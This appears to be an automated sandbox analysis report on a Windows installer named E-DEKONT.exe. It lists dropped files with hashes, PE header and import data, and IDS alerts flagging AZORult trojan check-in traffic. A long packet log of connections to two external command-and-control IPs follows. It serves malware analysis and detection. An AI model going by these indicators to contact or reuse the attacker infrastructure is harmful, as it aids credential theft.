                                                                          SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):165922
                                                                          Entropy (8bit):6.737126845009294
                                                                          Encrypted:false
                                                                          SSDEEP:3072:mEYhKhav/hqkoeGD+8H2yAIkD6EZq85d3wkwaIg0sAjx:mEYA44nKbyAIbYVd6aIg0sA9
                                                                          MD5:3F1BF7D734732FD87ECBF1E4FD52AEAE
                                                                          SHA1:3A327F4434EF577622FC9510456CCCE11604FDBF
                                                                          SHA-256:63612F1C5186DBDE730BD2A0535BBC7DDF03E94E051360DF65104887230D5675
                                                                          SHA-512:D132D1F9FDC363617FC15377177524A72D532DC28D485552AEA810F3E6D51F5F674371CC4C45AB7A058C2B76EB04CD7AC42207D3A4E35DFDFA31CDC2AE822142
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:C source, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):13484
                                                                          Entropy (8bit):5.15716859322729
                                                                          Encrypted:false
                                                                          SSDEEP:192:B3tdgdRmAMgyWkSctse3XX6ZjuguOixHRYqx0NzZW+08e:B3tuPdjJ0TCzZWv
                                                                          MD5:BD46EB22C1A1B4EA40373E8F57BFF4E3
                                                                          SHA1:CC2943E660BBB1697B7561F2776A7BCE2F36718A
                                                                          SHA-256:8361836BCB172722E5F2EE90AF31834B9B08B828A90E80E0BB930C336001B4CE
                                                                          SHA-512:5994643BCDFDF59B7EBF8FE36BC30CF0A454966FA95741D80AC81E9C42126A66ACDD782F6D7852A35CAE171FCC0DE1218EC1CD951829F7EC1C72B35EE7487D74
                                                                          Malicious:false
                                                                          Preview:/*.** 2018-09-27.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.*************************************************************************.**.** This file demonstrates an eponymous virtual table that returns information.** from sqlite3_status64() and sqlite3_db_status()..**.** Usage example:.**.** .load ./memstat.** .mode quote.** .header on.** SELECT * FROM memstat;.*/.#if !defined(SQLITE_CORE) || defined(SQLITE_ENABLE_MEMSTATVTAB).#if !defined(SQLITEINT_H).#include "sqlite3ext.h".#endif.SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>..#ifndef SQLITE_OMIT_VIRTUALTABLE../* memstat_vtab is a subclass of sqlite3_vtab which will.** serve as the underlying representation of a memstat virtual table.*/.typedef struct memstat_vtab memsta
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):138
                                                                          Entropy (8bit):5.559646592748364
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPl9vt3lAnsrtxBllO9p2hkq8PQ1/kbcw1w9lDk7kup:6v/lhPys8pQt8PQ2cw1IlDXup
                                                                          MD5:9863709F8F136F0F38A5D9CF2740143A
                                                                          SHA1:0EC6AA74A3FED4719B1B8D2E8468239489D84427
                                                                          SHA-256:2C86B3EDF2A397608FE0C12A634F175DE1E3C4E5C4610B8457578B549069A7B0
                                                                          SHA-512:B1D8DC9CAFF35264E117201C0DB2112F4C07BAB9235188D32F90B9D00DC2E7AC27ECC1FC9753C5F50949C95D91EEA0C5F318D6D1C8D7587CA0A68AD2CC1C4EB5
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR................a....sBIT....|.d....AIDAT8.c`........X..X......C...u..(&.%.. ..t.H6...$......S.F.....a/..&I......IEND.B`.
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1245
                                                                          Entropy (8bit):5.462849750105637
                                                                          Encrypted:false
                                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                          Malicious:false
                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):69983
                                                                          Entropy (8bit):7.997405530190593
                                                                          Encrypted:true
                                                                          SSDEEP:1536:30X06uHVfTFBRFMyLsstapQk8OtIopWndeX21HGaOSpD:EXru1fpBRS6sstapQk8MIo6HPpD
                                                                          MD5:6DE0E12441560225A88B03873D0B3BC7
                                                                          SHA1:1347ABD05EAA3113A13312798CE559F448C95E00
                                                                          SHA-256:973DAB089CA03380DE5DCA62FAE9DA9B4FE1061B3F172B77753BBA7A6EB24B74
                                                                          SHA-512:58A5EED2318DEFC481CA1BB3C242FCE1B8DAEC929A1B3C0E1F25EDE97F3778BF7A0DAEF9D4E95CA9A0D04168033D546595E98A5506030CC7505E128F97069CC8
                                                                          Malicious:false
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.761776865378202
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:E-DEKONT.exe
                                                                          File size:325782
                                                                          MD5:0aa36eb080cf7171cec271b2cd4d2108
                                                                          SHA1:eb7f3bf8e15ae16e765e480510d2260a9e9facb8
                                                                          SHA256:6ca208edbc718f737f74ee0a631ed22cd2bf67a0db679d9d1702575c087550cc
                                                                          SHA512:a350d13a00cfb426c046b370b018309fb614ab597159fc53a07b017143960d68dab186b71e12156bd8966234f49775f70d7bbfafe53ada4d7ded282d2780d489
                                                                          SSDEEP:6144:nQ606xDpoDTOfHQerv776jfhtjdTAhjr6ec5eF4fe8YCsboQ+Ni5JFapbARUTv/4:FpoPOfQqvH6j5PTIr6FZTQ+aJwp8KH4
                                                                          TLSH:136412502370C167D5B60BB0DA334EFB57369CA6E4496A8BC3507D8C7C72792AE2E349
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........
                                                                          Icon Hash:c60ccd1616164e46
                                                                          Entrypoint:0x403373
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+14h], ebx
                                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                                          mov dword ptr [esp+1Ch], ebx
                                                                          call dword ptr [004080A8h]
                                                                          call dword ptr [004080A4h]
                                                                          and eax, BFFFFFFFh
                                                                          cmp ax, 00000006h
                                                                          mov dword ptr [00434EECh], eax
                                                                          je 00007F8358BE64D3h
                                                                          push ebx
                                                                          call 00007F8358BE9769h
                                                                          cmp eax, ebx
                                                                          je 00007F8358BE64C9h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 004082B0h
                                                                          push esi
                                                                          call 00007F8358BE96E3h
                                                                          push esi
                                                                          call dword ptr [00408150h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], 00000000h
                                                                          jne 00007F8358BE64ACh
                                                                          push 0000000Ah
                                                                          call 00007F8358BE973Ch
                                                                          push 00000008h
                                                                          call 00007F8358BE9735h
                                                                          push 00000006h
                                                                          mov dword ptr [00434EE4h], eax
                                                                          call 00007F8358BE9729h
                                                                          cmp eax, ebx
                                                                          je 00007F8358BE64D1h
                                                                          push 0000001Eh
                                                                          call eax
                                                                          test eax, eax
                                                                          je 00007F8358BE64C9h
                                                                          or byte ptr [00434EEFh], 00000040h
                                                                          push ebp
                                                                          call dword ptr [00408044h]
                                                                          push ebx
                                                                          call dword ptr [004082A0h]
                                                                          mov dword ptr [00434FB8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push 000002B4h
                                                                          push eax
                                                                          push ebx
                                                                          push 0042B208h
                                                                          call dword ptr [00408188h]
                                                                          push 0040A2C8h
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x16898 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ef | 0x6600 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x149a | 0x1600 | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x41000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x76000 | 0x16898 | 0x16a00 | False | 0.7946089433701657 | data | 7.153289056271752 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x76478 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States
RT_ICON | 0x767e0 | 0x9d19 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x80500 | 0x4102 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States
RT_ICON | 0x84608 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x86bb0 | 0x16e8 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States
RT_ICON | 0x88298 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x89340 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States
RT_ICON | 0x8a1e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States
RT_ICON | 0x8aa90 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0x8b0f8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States
RT_ICON | 0x8b660 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_ICON | 0x8bac8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x8bdb0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_DIALOG | 0x8bed8 | 0x144 | data | English | United States
RT_DIALOG | 0x8c020 | 0x13c | data | English | United States
RT_DIALOG | 0x8c160 | 0x100 | data | English | United States
RT_DIALOG | 0x8c260 | 0x11c | data | English | United States
RT_DIALOG | 0x8c380 | 0xc4 | data | English | United States
RT_DIALOG | 0x8c448 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x8c4a8 | 0xae | data | English | United States
RT_MANIFEST | 0x8c558 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-09:20:38.942380 | TCP | 2029468 | ET TROJAN Win32/AZORult V3.3 Client Checkin M15 | 49852 | 80 | 192.168.11.20 | 104.21.44.194
11/29/22-09:20:40.337285 | TCP | 2029137 | ET TROJAN AZORult v3.3 Server Response M2 | 80 | 49852 | 104.21.44.194 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Nov 29, 2022 09:20:38.412281990 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.412508011 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.412667036 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.542740107 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.542876005 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.542977095 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.542983055 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543001890 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543178082 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543215990 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543241978 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543478966 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543525934 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674145937 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.674294949 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674294949 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674339056 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674387932 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674515009 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.674655914 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674712896 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674860954 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675086021 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675167084 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675200939 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675344944 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675391912 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675610065 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675615072 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675784111 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675805092 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675893068 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675935984 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.676100016 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.676116943 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.676171064 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.676223993 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806499004 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806631088 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806648970 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806715012 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806741953 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806744099 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806791067 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806931973 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.807013035 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.807025909 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.933048010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.941822052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:38.942106962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.942379951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.950925112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337285042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337395906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337474108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337546110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337565899 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337619066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337683916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337694883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337769985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337841988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337897062 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337898016 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337913990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337986946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338057041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338083982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338084936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338129044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338201046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338201046 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338277102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338337898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338418007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338418007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338525057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343271971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343364954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343431950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343493938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343533039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343533039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343555927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343616962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343616962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343621969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343686104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343746901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343808889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343841076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343841076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347188950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347274065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347342014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347404003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347466946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347529888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347567081 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347568035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347568035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347594976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347662926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347728014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347790956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347790956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347791910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347852945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347917080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347980976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348043919 CET8049852104.21.44.194192.168.11.20
